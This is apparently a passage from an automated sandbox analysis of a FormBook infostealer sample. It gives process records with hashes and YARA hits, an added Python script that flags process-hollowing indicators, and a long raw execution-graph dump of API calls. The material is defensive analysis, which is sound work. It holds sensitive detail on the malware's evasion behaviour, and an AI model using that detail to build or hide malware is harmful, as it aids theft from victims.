                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:03:29:16
                              Start date:16/09/2024
                              Path:C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe"
                              Imagebase:0x7a0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              Target ID:5
                              Start time:03:29:18
                              Start date:16/09/2024
                              Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                              Imagebase:0x8d0000
                              File size:478'720 bytes
                              MD5 hash:6599A09C160036131E4A933168DA245F
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:moderate
                              Has exited:false

                              Target ID:6
                              Start time:03:29:31
                              Start date:16/09/2024
                              Path:C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe"
                              Imagebase:0x7a0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              Target ID:8
                              Start time:03:29:48
                              Start date:16/09/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff79f9e0000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true
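Target 2 is the record worth reading twice in this list: its image is C:\Windows\SysWOW64\svchost.exe, yet its command line still names the sample on the desktop, which is what a process looks like after its original image has been replaced in memory. Target 3 runs from a directory under Program Files (x86) whose name is 67 random letters. The Python below is an added example, not code from the report: it parses the report's own Key:value target records (constructed inline from Targets 0, 2 and 3 above) and flags exactly those two indicators. The 32-letter threshold for a machine-generated directory name is an assumption of this example.

```python
import ntpath
import re

# Constructed sample: three of the target records from the process list above,
# in the report's own "Key:value" layout with a blank line between processes.
SAMPLE_REPORT = r"""
Target ID:0
Path:C:\Users\user\Desktop\PO2-2401-0016 (TR).exe
Commandline:"C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
MD5 hash:6F8E7D082D8C039064CBCC813D24DCB4

Target ID:2
Path:C:\Windows\SysWOW64\svchost.exe
Commandline:"C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B

Target ID:3
Path:C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
Commandline:"C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe"
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
"""

# Assumption of this example: a directory name made of 32 or more bare letters
# is treated as machine-generated.
RANDOM_DIR = re.compile(r"^[A-Za-z]{32,}$")


def parse_targets(text: str) -> list[dict]:
    """Parse the report's one-field-per-line records into dicts, splitting on the
    first colon only so drive letters (C:) and times (03:29:01) survive intact."""
    targets, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                targets.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        targets.append(current)
    return targets


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(None, 1)[0] if cmdline else ""


def audit(targets: list[dict]) -> list[tuple[str, str]]:
    """(Target ID, indicator) pairs for processes that deserve a closer look."""
    findings = []
    for t in targets:
        tid = t.get("Target ID", "?")
        path = t.get("Path", "")
        image = cmdline_image(t.get("Commandline", ""))
        # A hollowed process keeps the creator's command line but executes a
        # different image, so the two basenames disagree.
        if image and ntpath.basename(image).lower() != ntpath.basename(path).lower():
            findings.append((tid, "image/command-line mismatch"))
        if RANDOM_DIR.match(ntpath.basename(ntpath.dirname(path))):
            findings.append((tid, "random-looking install directory"))
    return findings


if __name__ == "__main__":
    for tid, why in audit(parse_targets(SAMPLE_REPORT)):
        print(f"Target {tid}: {why}")
```

The same two checks apply unchanged to a live endpoint: compare the image path from the kernel (Sysmon event 1 Image, or the process object) against the executable named in the CommandLine field, and treat a disagreement as a process-replacement indicator rather than a logging quirk.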


                                Execution Graph

                                Execution Coverage:2.8%
                                Dynamic/Decrypted Code Coverage:1.1%
                                Signature Coverage:5.5%
                                Total number of Nodes:1664
                                Total number of Limit Nodes:38
                                [Execution graph: serialized call graph of the interactive viewer, not reproduced. Starting at 0x152e37 in the sample's image, the recovered nodes pass through library loading (LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary), embedded-resource access (FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal), heap and CRT error paths (RtlAllocateHeap, RtlFreeHeap, RaiseException, GetLastError, EnterCriticalSection/LeaveCriticalSection), path lookups (GetModuleFileNameW, GetFullPathNameW), and a window and tray-icon message loop (DefWindowProcW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DestroyWindow, DestroyIcon, LoadStringW, PostQuitMessage). The graph dump is truncated in this copy of the page.]
153994 ___scrt_fastfail 97734->97743 97736 1933c9 97735->97736 97737 15397c 97735->97737 97740 156350 22 API calls 97736->97740 97737->97734 97739 153986 97737->97739 97738->97743 97755 156350 97739->97755 97742 1933d7 97740->97742 97742->97743 97764 1533c6 97742->97764 97745 1539f9 Shell_NotifyIconW 97743->97745 97745->97747 97746 1933f9 97748 1533c6 22 API calls 97746->97748 97747->97719 97748->97743 97749->97714 97751 16fe0b 22 API calls 97750->97751 97752 156295 97751->97752 97753 16fddb 22 API calls 97752->97753 97754 15394d 97753->97754 97754->97731 97754->97732 97756 156362 97755->97756 97757 194a51 97755->97757 97773 156373 97756->97773 97783 154a88 22 API calls __fread_nolock 97757->97783 97760 15636e 97760->97743 97761 194a5b 97762 194a67 97761->97762 97763 15a8c7 22 API calls 97761->97763 97763->97762 97765 1930bb 97764->97765 97766 1533dd 97764->97766 97768 16fddb 22 API calls 97765->97768 97789 1533ee 97766->97789 97770 1930c5 _wcslen 97768->97770 97769 1533e8 97769->97746 97771 16fe0b 22 API calls 97770->97771 97772 1930fe __fread_nolock 97771->97772 97774 156382 97773->97774 97780 1563b6 __fread_nolock 97773->97780 97775 194a82 97774->97775 97776 1563a9 97774->97776 97774->97780 97778 16fddb 22 API calls 97775->97778 97784 15a587 97776->97784 97779 194a91 97778->97779 97781 16fe0b 22 API calls 97779->97781 97780->97760 97782 194ac5 __fread_nolock 97781->97782 97783->97761 97785 15a59d 97784->97785 97788 15a598 __fread_nolock 97784->97788 97786 19f80f 97785->97786 97787 16fe0b 22 API calls 97785->97787 97787->97788 97788->97780 97790 1533fe _wcslen 97789->97790 97791 19311d 97790->97791 97792 153411 97790->97792 97793 16fddb 22 API calls 97791->97793 97794 15a587 22 API calls 97792->97794 97795 193127 97793->97795 97796 15341e __fread_nolock 97794->97796 97797 16fe0b 22 API calls 97795->97797 97796->97769 97798 193157 __fread_nolock 97797->97798 97799 151033 97804 154c91 97799->97804 97803 151042 97805 15a961 22 API calls 97804->97805 97806 154cff 
97805->97806 97812 153af0 97806->97812 97809 154d9c 97810 151038 97809->97810 97815 1551f7 22 API calls __fread_nolock 97809->97815 97811 1700a3 29 API calls __onexit 97810->97811 97811->97803 97816 153b1c 97812->97816 97815->97809 97817 153b0f 97816->97817 97818 153b29 97816->97818 97817->97809 97818->97817 97819 153b30 RegOpenKeyExW 97818->97819 97819->97817 97820 153b4a RegQueryValueExW 97819->97820 97821 153b80 RegCloseKey 97820->97821 97822 153b6b 97820->97822 97821->97817 97822->97821 97823 15f7bf 97824 15fcb6 97823->97824 97825 15f7d3 97823->97825 97913 15aceb 23 API calls messages 97824->97913 97827 15fcc2 97825->97827 97828 16fddb 22 API calls 97825->97828 97914 15aceb 23 API calls messages 97827->97914 97830 15f7e5 97828->97830 97830->97827 97831 15f83e 97830->97831 97832 15fd3d 97830->97832 97857 15ed9d messages 97831->97857 97858 161310 97831->97858 97915 1c1155 22 API calls 97832->97915 97835 15fef7 97843 15a8c7 22 API calls 97835->97843 97835->97857 97838 1a4b0b 97917 1c359c 82 API calls __wsopen_s 97838->97917 97839 15a8c7 22 API calls 97854 15ec76 messages 97839->97854 97840 1a4600 97844 15a8c7 22 API calls 97840->97844 97840->97857 97843->97857 97844->97857 97846 15fbe3 97848 1a4bdc 97846->97848 97855 15f3ae messages 97846->97855 97846->97857 97847 15a961 22 API calls 97847->97854 97918 1c359c 82 API calls __wsopen_s 97848->97918 97850 1700a3 29 API calls pre_c_initialization 97850->97854 97851 170242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97851->97854 97852 1a4beb 97919 1c359c 82 API calls __wsopen_s 97852->97919 97853 16fddb 22 API calls 97853->97854 97854->97835 97854->97838 97854->97839 97854->97840 97854->97846 97854->97847 97854->97850 97854->97851 97854->97852 97854->97853 97854->97855 97856 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97854->97856 97854->97857 97911 1601e0 207 API calls 2 library calls 97854->97911 97912 1606a0 41 
API calls messages 97854->97912 97855->97857 97916 1c359c 82 API calls __wsopen_s 97855->97916 97856->97854 97859 161376 97858->97859 97860 1617b0 97858->97860 97861 1a6331 97859->97861 97865 161940 9 API calls 97859->97865 98057 170242 5 API calls __Init_thread_wait 97860->98057 98062 1d709c 207 API calls 97861->98062 97863 1617ba 97868 159cb3 22 API calls 97863->97868 97870 1617fb 97863->97870 97867 1613a0 97865->97867 97866 1a633d 97866->97854 97869 161940 9 API calls 97867->97869 97874 1617d4 97868->97874 97871 1613b6 97869->97871 97872 1a6346 97870->97872 97875 16182c 97870->97875 97871->97870 97873 1613ec 97871->97873 98063 1c359c 82 API calls __wsopen_s 97872->98063 97873->97872 97897 161408 __fread_nolock 97873->97897 98058 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97874->98058 98059 15aceb 23 API calls messages 97875->98059 97878 161839 98060 16d217 207 API calls 97878->98060 97881 1a636e 98064 1c359c 82 API calls __wsopen_s 97881->98064 97882 16152f 97884 16153c 97882->97884 97885 1a63d1 97882->97885 97887 161940 9 API calls 97884->97887 98066 1d5745 54 API calls _wcslen 97885->98066 97889 161549 97887->97889 97888 16fddb 22 API calls 97888->97897 97894 161940 9 API calls 97889->97894 97902 1615c7 messages 97889->97902 97890 161872 97890->97861 98061 16faeb 23 API calls 97890->98061 97891 16fe0b 22 API calls 97891->97897 97892 16171d 97892->97854 97898 161563 97894->97898 97897->97878 97897->97881 97897->97882 97897->97888 97897->97891 97899 1a63b2 97897->97899 97897->97902 98032 15ec40 97897->98032 97898->97902 97905 15a8c7 22 API calls 97898->97905 98065 1c359c 82 API calls __wsopen_s 97899->98065 97902->97890 97904 16167b messages 97902->97904 97920 161940 97902->97920 97930 1de204 97902->97930 97966 1c744a 97902->97966 98022 156246 97902->98022 98026 1c83da 97902->98026 98029 1d958b 97902->98029 98067 1c359c 82 API calls __wsopen_s 97902->98067 97904->97892 98056 16ce17 22 API calls messages 97904->98056 97905->97902 
97911->97854 97912->97854 97913->97827 97914->97832 97915->97857 97916->97857 97917->97857 97918->97852 97919->97857 97921 161981 97920->97921 97922 16195d 97920->97922 98068 170242 5 API calls __Init_thread_wait 97921->98068 97929 16196e 97922->97929 98070 170242 5 API calls __Init_thread_wait 97922->98070 97924 16198b 97924->97922 98069 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97924->98069 97926 168727 97926->97929 98071 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97926->98071 97929->97902 97931 15a961 22 API calls 97930->97931 97932 1de21b 97931->97932 98072 157510 97932->98072 97935 156270 22 API calls 97936 1de23d 97935->97936 97937 157510 53 API calls 97936->97937 97938 1de24a 97937->97938 97939 1de2c7 97938->97939 97940 1de262 97938->97940 97941 157510 53 API calls 97939->97941 98114 15b567 39 API calls 97940->98114 97943 1de2cc 97941->97943 97945 1de2d9 97943->97945 97946 1de314 97943->97946 97944 1de267 97944->97945 97949 1de280 97944->97949 98117 159c6e 22 API calls 97945->98117 97947 1de32c 97946->97947 98118 15b567 39 API calls 97946->98118 97958 1de345 97947->97958 98119 15b567 39 API calls 97947->98119 98115 156d25 22 API calls __fread_nolock 97949->98115 97953 15a8c7 22 API calls 97955 1de35f 97953->97955 97954 1de28d 97956 156350 22 API calls 97954->97956 98095 1b92c8 97955->98095 97957 1de29b 97956->97957 98116 156d25 22 API calls __fread_nolock 97957->98116 97958->97953 97961 1de2b4 97962 156350 22 API calls 97961->97962 97965 1de2c2 97962->97965 97963 1de2e6 97963->97902 98120 1562b5 22 API calls 97965->98120 97967 1c7469 97966->97967 97968 1c7474 97966->97968 98145 15b567 39 API calls 97967->98145 97971 15a961 22 API calls 97968->97971 98009 1c7554 97968->98009 97970 16fddb 22 API calls 97972 1c7587 97970->97972 97973 1c7495 97971->97973 97974 16fe0b 22 API calls 97972->97974 97975 15a961 22 API calls 97973->97975 97976 1c7598 97974->97976 97977 1c749e 97975->97977 97978 156246 CloseHandle 
97976->97978 97980 157510 53 API calls 97977->97980 97979 1c75a3 97978->97979 97981 15a961 22 API calls 97979->97981 97982 1c74aa 97980->97982 97983 1c75ab 97981->97983 98146 15525f 22 API calls 97982->98146 97985 156246 CloseHandle 97983->97985 97987 1c75b2 97985->97987 97986 1c74bf 97988 156350 22 API calls 97986->97988 97990 157510 53 API calls 97987->97990 97989 1c74f2 97988->97989 97991 1c754a 97989->97991 98147 1bd4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97989->98147 97992 1c75be 97990->97992 98149 15b567 39 API calls 97991->98149 97994 156246 CloseHandle 97992->97994 97997 1c75c8 97994->97997 97996 1c7502 97996->97991 97998 1c7506 97996->97998 98137 155745 97997->98137 97999 159cb3 22 API calls 97998->97999 98001 1c7513 97999->98001 98148 1bd2c1 26 API calls 98001->98148 98004 1c76de GetLastError 98006 1c76f7 98004->98006 98005 1c75ea 98150 1553de 27 API calls messages 98005->98150 98157 156216 CloseHandle messages 98006->98157 98009->97970 98020 1c76a4 98009->98020 98010 1c75f8 98151 1553c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98010->98151 98011 1c751c 98011->97991 98013 1c7645 98014 16fddb 22 API calls 98013->98014 98016 1c7679 98014->98016 98015 1c75ff 98015->98013 98152 1bccff 98015->98152 98017 15a961 22 API calls 98016->98017 98019 1c7686 98017->98019 98019->98020 98156 1b417d 22 API calls __fread_nolock 98019->98156 98020->97902 98023 156250 98022->98023 98024 15625f 98022->98024 98023->97902 98024->98023 98025 156264 CloseHandle 98024->98025 98025->98023 98160 1c98e3 98026->98160 98028 1c83ea 98028->97902 98223 1d7f59 98029->98223 98031 1d959b 98031->97902 98054 15ec76 messages 98032->98054 98033 16fddb 22 API calls 98033->98054 98034 170242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98034->98054 98035 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98035->98054 98036 15fef7 98044 15a8c7 22 API calls 98036->98044 
98049 15ed9d messages 98036->98049 98039 1a4b0b 98310 1c359c 82 API calls __wsopen_s 98039->98310 98040 15a8c7 22 API calls 98040->98054 98041 1a4600 98045 15a8c7 22 API calls 98041->98045 98041->98049 98044->98049 98045->98049 98047 15fbe3 98047->98049 98050 1a4bdc 98047->98050 98055 15f3ae messages 98047->98055 98048 15a961 22 API calls 98048->98054 98049->97897 98311 1c359c 82 API calls __wsopen_s 98050->98311 98051 1700a3 29 API calls pre_c_initialization 98051->98054 98053 1a4beb 98312 1c359c 82 API calls __wsopen_s 98053->98312 98054->98033 98054->98034 98054->98035 98054->98036 98054->98039 98054->98040 98054->98041 98054->98047 98054->98048 98054->98049 98054->98051 98054->98053 98054->98055 98307 1601e0 207 API calls 2 library calls 98054->98307 98308 1606a0 41 API calls messages 98054->98308 98055->98049 98309 1c359c 82 API calls __wsopen_s 98055->98309 98056->97904 98057->97863 98058->97870 98059->97878 98060->97890 98061->97890 98062->97866 98063->97902 98064->97902 98065->97902 98066->97898 98067->97902 98068->97924 98069->97922 98070->97926 98071->97929 98073 157525 98072->98073 98089 157522 98072->98089 98074 15752d 98073->98074 98075 15755b 98073->98075 98121 1751c6 26 API calls 98074->98121 98077 1950f6 98075->98077 98080 15756d 98075->98080 98086 19500f 98075->98086 98124 175183 26 API calls 98077->98124 98078 15753d 98084 16fddb 22 API calls 98078->98084 98122 16fb21 51 API calls 98080->98122 98081 19510e 98081->98081 98085 157547 98084->98085 98087 159cb3 22 API calls 98085->98087 98088 16fe0b 22 API calls 98086->98088 98091 195088 98086->98091 98087->98089 98090 195058 98088->98090 98089->97935 98092 16fddb 22 API calls 98090->98092 98123 16fb21 51 API calls 98091->98123 98093 19507f 98092->98093 98094 159cb3 22 API calls 98093->98094 98094->98091 98096 15a961 22 API calls 98095->98096 98097 1b92de 98096->98097 98098 156270 22 API calls 98097->98098 98099 1b92f2 98098->98099 98106 1b9314 98099->98106 98125 1b8e54 98099->98125 98102 1b8e54 41 
API calls 98102->98106 98105 156350 22 API calls 98105->98106 98106->98102 98106->98105 98107 1b93b3 98106->98107 98109 1b9397 98106->98109 98133 156d25 22 API calls __fread_nolock 98106->98133 98108 15a8c7 22 API calls 98107->98108 98110 1b93c2 98107->98110 98108->98110 98134 156d25 22 API calls __fread_nolock 98109->98134 98110->97965 98112 1b93a7 98113 156350 22 API calls 98112->98113 98113->98107 98114->97944 98115->97954 98116->97961 98117->97963 98118->97947 98119->97958 98120->97963 98121->98078 98122->98078 98123->98077 98124->98081 98127 1b8e74 _wcslen 98125->98127 98126 1b8f63 98126->98106 98132 156d25 22 API calls __fread_nolock 98126->98132 98127->98126 98128 1b8f68 98127->98128 98130 1b8ea9 98127->98130 98128->98126 98136 16ce60 41 API calls 98128->98136 98130->98126 98135 16ce60 41 API calls 98130->98135 98132->98106 98133->98106 98134->98112 98135->98130 98136->98128 98138 15575c CreateFileW 98137->98138 98139 194035 98137->98139 98140 15577b 98138->98140 98139->98140 98141 19403b CreateFileW 98139->98141 98140->98004 98140->98005 98141->98140 98142 194063 98141->98142 98158 1554c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98142->98158 98144 19406e 98144->98140 98145->97968 98146->97986 98147->97996 98148->98011 98149->98009 98150->98010 98151->98015 98153 1bcd19 WriteFile 98152->98153 98154 1bcd0e 98152->98154 98153->98013 98159 1bcc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98154->98159 98156->98020 98157->98020 98158->98144 98159->98153 98161 1c99e8 98160->98161 98162 1c9902 98160->98162 98218 1c9caa 39 API calls 98161->98218 98164 16fddb 22 API calls 98162->98164 98165 1c9909 98164->98165 98167 16fe0b 22 API calls 98165->98167 98166 1c99a2 98168 1c99ca 98166->98168 98171 1c9ac5 98166->98171 98177 1c9a33 98166->98177 98169 1c991a 98167->98169 98168->98028 98170 156246 CloseHandle 98169->98170 98172 1c9925 98170->98172 98211 1c1e96 98171->98211 98174 15a961 22 API calls 98172->98174 98175 1c992d 98174->98175 98179 156246 
CloseHandle 98175->98179 98176 1c9acc 98181 1bccff 4 API calls 98176->98181 98178 157510 53 API calls 98177->98178 98187 1c9a3a 98178->98187 98180 1c9934 98179->98180 98183 157510 53 API calls 98180->98183 98205 1c9aa8 98181->98205 98182 1c9abb 98220 1bcd57 30 API calls 98182->98220 98186 1c9940 98183->98186 98184 1c9a6e 98188 156270 22 API calls 98184->98188 98189 156246 CloseHandle 98186->98189 98187->98182 98187->98184 98191 1c9a7e 98188->98191 98192 1c994a 98189->98192 98190 156246 CloseHandle 98193 1c9b1e 98190->98193 98194 1c9a8e 98191->98194 98198 15a8c7 22 API calls 98191->98198 98195 155745 5 API calls 98192->98195 98221 156216 CloseHandle messages 98193->98221 98196 1533c6 22 API calls 98194->98196 98199 1c9959 98195->98199 98200 1c9a9c 98196->98200 98198->98194 98201 1c995d 98199->98201 98202 1c99c2 98199->98202 98219 1bcd57 30 API calls 98200->98219 98215 1553de 27 API calls messages 98201->98215 98217 156216 CloseHandle messages 98202->98217 98205->98168 98205->98190 98207 1c996b 98216 1553c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98207->98216 98209 1c9972 98209->98166 98210 1bccff 4 API calls 98209->98210 98210->98166 98212 1c1e9f 98211->98212 98213 1c1ea4 98211->98213 98222 1c0f67 24 API calls __fread_nolock 98212->98222 98213->98176 98215->98207 98216->98209 98217->98168 98218->98166 98219->98205 98220->98205 98221->98168 98222->98213 98224 157510 53 API calls 98223->98224 98225 1d7f90 98224->98225 98249 1d7fd5 messages 98225->98249 98261 1d8cd3 98225->98261 98227 1d8281 98228 1d844f 98227->98228 98234 1d828f 98227->98234 98302 1d8ee4 60 API calls 98228->98302 98231 1d845e 98233 1d846a 98231->98233 98231->98234 98232 157510 53 API calls 98251 1d8049 98232->98251 98233->98249 98274 1d7e86 98234->98274 98239 1d82c8 98289 16fc70 98239->98289 98242 1d82e8 98295 1c359c 82 API calls __wsopen_s 98242->98295 98243 1d8302 98296 1563eb 22 API calls 98243->98296 98246 1d82f3 GetCurrentProcess TerminateProcess 98246->98243 98247 1d8311 98297 156a50 
22 API calls 98247->98297 98249->98031 98250 1d832a 98259 1d8352 98250->98259 98298 1604f0 22 API calls 98250->98298 98251->98227 98251->98232 98251->98249 98293 1b417d 22 API calls __fread_nolock 98251->98293 98294 1d851d 42 API calls _strftime 98251->98294 98252 1d84c5 98252->98249 98257 1d84d9 FreeLibrary 98252->98257 98254 1d8341 98299 1d8b7b 75 API calls 98254->98299 98257->98249 98259->98252 98300 1604f0 22 API calls 98259->98300 98301 15aceb 23 API calls messages 98259->98301 98303 1d8b7b 75 API calls 98259->98303 98262 15aec9 22 API calls 98261->98262 98263 1d8cee CharLowerBuffW 98262->98263 98264 1b8e54 41 API calls 98263->98264 98265 1d8d0f 98264->98265 98267 15a961 22 API calls 98265->98267 98273 1d8d48 _wcslen 98265->98273 98268 1d8d2a 98267->98268 98304 156d25 22 API calls __fread_nolock 98268->98304 98270 1d8d3e 98271 1593b2 22 API calls 98270->98271 98271->98273 98272 1d8e5e _wcslen 98272->98251 98273->98272 98305 1d851d 42 API calls _strftime 98273->98305 98275 1d7ea1 98274->98275 98279 1d7eec 98274->98279 98276 16fe0b 22 API calls 98275->98276 98277 1d7ec3 98276->98277 98278 16fddb 22 API calls 98277->98278 98277->98279 98278->98277 98280 1d9096 98279->98280 98281 1d92ab messages 98280->98281 98288 1d90ba _strcat _wcslen 98280->98288 98281->98239 98282 15b567 39 API calls 98282->98288 98283 15b38f 39 API calls 98283->98288 98284 15b6b5 39 API calls 98284->98288 98285 17ea0c 21 API calls ___std_exception_copy 98285->98288 98286 157510 53 API calls 98286->98288 98288->98281 98288->98282 98288->98283 98288->98284 98288->98285 98288->98286 98306 1befae 24 API calls _wcslen 98288->98306 98290 16fc85 98289->98290 98291 16fd1d VirtualProtect 98290->98291 98292 16fceb 98290->98292 98291->98292 98292->98242 98292->98243 98293->98251 98294->98251 98295->98246 98296->98247 98297->98250 98298->98254 98299->98259 98300->98259 98301->98259 98302->98231 98303->98259 98304->98270 98305->98272 98306->98288 98307->98054 98308->98054 98309->98049 98310->98049 
98311->98053 98312->98049 98313 1703fb 98314 170407 ___DestructExceptionObject 98313->98314 98342 16feb1 98314->98342 98316 17040e 98317 170561 98316->98317 98320 170438 98316->98320 98369 17083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98317->98369 98319 170568 98370 174e52 28 API calls _abort 98319->98370 98331 170477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98320->98331 98353 18247d 98320->98353 98322 17056e 98371 174e04 28 API calls _abort 98322->98371 98325 170576 98327 170457 98329 1704d8 98361 170959 98329->98361 98331->98329 98365 174e1a 38 API calls 3 library calls 98331->98365 98333 1704de 98334 1704f3 98333->98334 98366 170992 GetModuleHandleW 98334->98366 98336 1704fa 98336->98319 98337 1704fe 98336->98337 98338 170507 98337->98338 98367 174df5 28 API calls _abort 98337->98367 98368 170040 13 API calls 2 library calls 98338->98368 98341 17050f 98341->98327 98343 16feba 98342->98343 98372 170698 IsProcessorFeaturePresent 98343->98372 98345 16fec6 98373 172c94 10 API calls 3 library calls 98345->98373 98347 16fecb 98348 16fecf 98347->98348 98374 182317 98347->98374 98348->98316 98351 16fee6 98351->98316 98354 182494 98353->98354 98355 170a8c _ValidateLocalCookies 5 API calls 98354->98355 98356 170451 98355->98356 98356->98327 98357 182421 98356->98357 98360 182450 98357->98360 98358 170a8c _ValidateLocalCookies 5 API calls 98359 182479 98358->98359 98359->98331 98360->98358 98433 172340 98361->98433 98364 17097f 98364->98333 98365->98329 98366->98336 98367->98338 98368->98341 98369->98319 98370->98322 98371->98325 98372->98345 98373->98347 98378 18d1f6 98374->98378 98377 172cbd 8 API calls 3 library calls 98377->98348 98381 18d213 98378->98381 98382 18d20f 98378->98382 98380 16fed8 98380->98351 98380->98377 98381->98382 98384 184bfb 98381->98384 98396 170a8c 98382->98396 98385 184c07 ___DestructExceptionObject 98384->98385 98403 182f5e EnterCriticalSection 
98385->98403 98387 184c0e 98404 1850af 98387->98404 98389 184c1d 98390 184c2c 98389->98390 98417 184a8f 29 API calls 98389->98417 98419 184c48 LeaveCriticalSection _abort 98390->98419 98393 184c27 98418 184b45 GetStdHandle GetFileType 98393->98418 98394 184c3d __fread_nolock 98394->98381 98397 170a97 IsProcessorFeaturePresent 98396->98397 98398 170a95 98396->98398 98400 170c5d 98397->98400 98398->98380 98432 170c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98400->98432 98402 170d40 98402->98380 98403->98387 98405 1850bb ___DestructExceptionObject 98404->98405 98406 1850c8 98405->98406 98407 1850df 98405->98407 98428 17f2d9 20 API calls __dosmaperr 98406->98428 98420 182f5e EnterCriticalSection 98407->98420 98410 1850cd 98429 1827ec 26 API calls pre_c_initialization 98410->98429 98412 1850d7 __fread_nolock 98412->98389 98413 1850eb 98416 185117 98413->98416 98421 185000 98413->98421 98430 18513e LeaveCriticalSection _abort 98416->98430 98417->98393 98418->98390 98419->98394 98420->98413 98422 184c7d __dosmaperr 20 API calls 98421->98422 98423 185012 98422->98423 98427 18501f 